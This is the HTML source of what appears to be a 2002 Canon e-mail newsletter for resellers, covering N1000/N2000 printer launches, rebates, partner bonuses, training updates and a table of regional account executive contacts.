 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="here"&gt;They're Here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Canon's N1000 and N2000 innovative Office Color Printers are here!  Orders are now being taken for these ... Super High Speed ... Super High Quality ... Large Volume printers!  With super low operating costs and excellent durability, these printers provide the solution to your customers' business color needs.&lt;br&gt;
 &lt;br&gt;Providing our resellers with the tools necessary to be successful in the marketplace is important to us.  In an effort to help you jump-start your N1000 printer sales, we are making available, on a first come first served basis, HALF-PRICE N1000 DEMO units.  For your convenience, these units can be purchased at  Ingram Micro, Tech Data or D&amp;H.  There is a limit of one half-price unit per reseller - and supplies are limited - so order today!&lt;br&gt;
 &lt;br&gt;To help you generate interest with your customers for the N1000/N2000, we have created a video banner ad that can be run on your website.  Log on to our  reseller website:  &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kxw3FhUCGLs-y39w-_lR"&gt;http://www.canonresellers.com&lt;/a&gt; to view the N1000/N2000 video banner ad.  You'll find the ad running on the Home Page.  To order a CD of this video banner ad for your use, contact your Canon Account Executive.
 &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="check"&gt;Check Out Our Q3 Promotions&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="1" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr bgcolor="#d4dfff"&gt; 
     &lt;td width="150" bgcolor="#d4dfff" align="left"&gt;
       &lt;div align="left"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Product&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
     &lt;/td&gt;
     &lt;td align="middle" width="150"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Instant Rebate*&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td align="middle" width="127"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Timeframe&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="150"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;imageCLASS 1100&lt;/font&gt;&lt;/td&gt;
     &lt;td align="middle" width="150"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$100&lt;/font&gt;&lt;/td&gt;
     &lt;td align="middle" width="127"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Through September 30, 2002&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;*All rebates will be reflected on the distributor invoice price &lt;b&gt;&lt;i&gt;at the time of purchase&lt;/i&gt;&lt;/b&gt;.&lt;br&gt;
       &lt;br&gt;&lt;b&gt;Quarterly Performance/Growth Bonus&lt;/b&gt;&lt;br&gt;
       &lt;br&gt;It's a new quarter and a fresh opportunity to become a Canon Premier Partner.  Our quarterly growth goals are within reach!  Your purchases of all eligible hardware* between July 1, 2002 and September 30, 2002 work toward your Premier Partner status.  Following are the rebate categories:
       &lt;br&gt;
 	  &lt;br&gt;
       $50,000-$99,000 = 4% rebate&lt;br&gt;
       $100,000+ = 6% rebate&lt;br&gt;
       &lt;br&gt;
       Claim forms for submitting your claims are available from your Canon reseller Account Executive and at &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZAScfHiaSIKlsTn8N_Jj9R" target="_blank"&gt;www.canonresellers.com&lt;/a&gt;.&lt;br&gt;
       &lt;br&gt;
       &lt;font size="2"&gt;*Only hardware is eligible - DR-3060, DR-3080C, DR-5020, DR-5080C, DR-4580U, DR-4080U, N1000/N2000 Office Color Printers, imageCLASS 2200 and imageCLASS 1100.  CarePAKS, consumables, maintenance kits and media are not eligible.&lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       Click on  &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZhIMQRNGWF8w6YrPhsR" target="_blank"&gt;www.canonresellers.com&lt;/a&gt;, to find your tools for success! 
       &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center" bgcolor="#000000"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="guess"&gt;Guess What's Coming to Distribution&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;
 Here's a clue:  Canon is known 'far and wide' for its products.  Coming soon&amp;#151;at a distributor near you - we'll show you just how 'wide' our products can be.  Watch for another clue in our August newsletter!&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#ffffff"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center"&gt;
   &lt;tr bgcolor="#e2e2e2"&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;a name="training"&gt;Web Based Training Addition / We Have a Winner&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;As promised, we're about to launch another web training course.  Final touches are being made on Canon's &lt;b&gt;N1000/N2000&lt;/b&gt; web training course.  This creative and informative course - covering topics that include  Features, Installation, Connectivity and Markets - is not to be missed.  Details to follow.&lt;br&gt;
       &lt;br&gt;
       We have a winner!  Congratulations to everyone who completed the imageCLASS 1100 web training before June 30!  The winning name was randomly selected from a 'hat' and we're pleased to announce the winner of the Canon PowerShot A20 digital camera works at one of our valued resellers in North Carolina!&lt;/font&gt;&lt;/td&gt;
     &lt;td align="right" valign="middle"&gt;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9Lq-NyhmFz_e0CvgpaFR"&gt;&lt;img src="http://www.captureleads.com/canon/leadblasts/nlimages/simon_anim.gif" width="173" height="173" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Although the contest is over... the learning should not stop.  If you have not yet completed this informative imageCLASS 1100 training course, log on to &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTQcIiTPDuYWD0V_Wy4R" target="_blank"&gt;http://www.canonresellers.com&lt;/a&gt; right click on Simon and go to the training site. &lt;br&gt;
         &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="5" align="center"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2" bgcolor="#e2e2e2"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;a name="reseller"&gt;Reseller Account Executive&amp;#151;Contact Changes&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;Canon has a dedicated team of Account Executives whose mission is to work with you to achieve our mutual business goals.&lt;br&gt;
       &lt;br&gt;
       Check the list below and note the name and e-mail address of the Account Executive assigned to your state.  Be sure to contact your Account Executive for support with the following:
 &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt; 
       &lt;ul&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; 
         &lt;li type="square"&gt;N1000/N2000 Video Banner Ad&lt;br&gt;
         &lt;li type="square"&gt;Events (Open Houses/Shows)&lt;br&gt;
 		&lt;li type="square"&gt;Sales Support Collateral&lt;br&gt;
 		&lt;li type="square"&gt;Discounted Demo Units&lt;br&gt;
 &lt;/li&gt;&lt;/font&gt; 
       &lt;/ul&gt;
     &lt;/td&gt;
     &lt;td valign="top"&gt; 
       &lt;ul&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;
         &lt;li type="square"&gt;End User Sales Calls&lt;br&gt;
 		&lt;li type="square"&gt;Demand Generation&lt;br&gt;
 		&lt;li type="square"&gt;Product Training&lt;br&gt;
 		&lt;li type="square"&gt;Bids&lt;br&gt;
         &lt;/LI&gt;&lt;/font&gt;
       &lt;/ul&gt;
     &lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Account 
 		Executives are listed below with the states that they cover.&lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Northeast&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;John 
       Brogan &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:jbrogan@cusa.canon.com" &gt;(jbrogan@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Connecticut&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Maine &lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Hampshire&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Rhode Island&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Massachusetts&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New York&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Jersey&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Vermont&lt;/font&gt;&lt;/td&gt;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sans-serif"&gt;Mid Atlantic&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Greg Harzenski&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:gharzenski@cusa.canon.com" &gt;(gharzenski@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Delaware&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Maryland&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Washington D.C.&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;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sans-serif"&gt;Midwest&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Jennifer Mickeletto &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:zzzickeletto@cusa.canon.com" &gt;(zzzickeletto@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Indiana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Kansas&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Missouri&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Ohio&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Colorado&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Kentucky&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Nebraska&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Tennessee&lt;/font&gt;&lt;/td&gt;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sans-serif"&gt;Mid North&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Chad Crump&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:ccrump@cusa.canon.com" &gt;(ccrump@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Alaska&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Illinois&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Minnesota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Washington&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Idaho&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Montana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;North Dakota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Wisconsin&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Iowa&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Michigan&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South Dakota&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Wyoming&lt;/font&gt;&lt;/td&gt;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valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Randal Kendrix &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:rkendrix@cusa.canon.com" &gt;(rkendrix@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Arkansas&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Mississippi&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Oklahoma&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Utah&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Louisiana&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;New Mexico&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Texas&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;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sans-serif"&gt;Southeast&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Carmen DiMartino &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:cdimartino@cusa.canon.com" &gt;(cdimartino@cusa.canon.com)&lt;/A&gt; 
       &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Alabama&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;North Carolina&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Puerto Rico&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;West Virginia&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Florida&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South Carolina&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Virginia&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Georgia&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Pennsylvania&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Virgin Islands&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;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sans-serif"&gt;Southwest&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Heath Tagtmeyer &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:htagtmeyer@cusa.canon.com" &gt;(htagtmeyer@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Arizona&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Hawaii&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Oregon&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;California&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Nevada&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;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colspan="4"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i&gt;
     If you wish to opt out of receiving future e-mail blasts, please &lt;a href="#"&gt;click here&lt;/a&gt;. If you would like additional recipients to receive our monthly communications, send additional names and e-mail addresses to &lt;A href="mailto:canonresellers@cits.canon.com"&gt;canonresellers@cits.canon.com&lt;/A&gt;.
     &lt;/i&gt;&lt;/font&gt;
     &lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
